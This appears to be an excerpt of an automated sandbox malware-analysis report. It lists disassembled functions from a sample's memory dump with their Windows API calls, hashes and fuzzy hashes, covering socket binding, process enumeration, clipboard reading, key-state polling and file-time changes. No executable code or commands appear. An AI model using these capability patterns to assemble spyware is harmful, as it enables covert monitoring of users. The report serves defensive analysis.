                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: DEFINE$`$h$h
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-4194577831
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                                                                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2609815416-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2693929171-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: DOWN
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4170576061-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3539004672-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32 ref: 0047733F
                                                                                                                                                                                                                                                                                                                                                                                                                • IsZoomed.USER32 ref: 0047734D
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
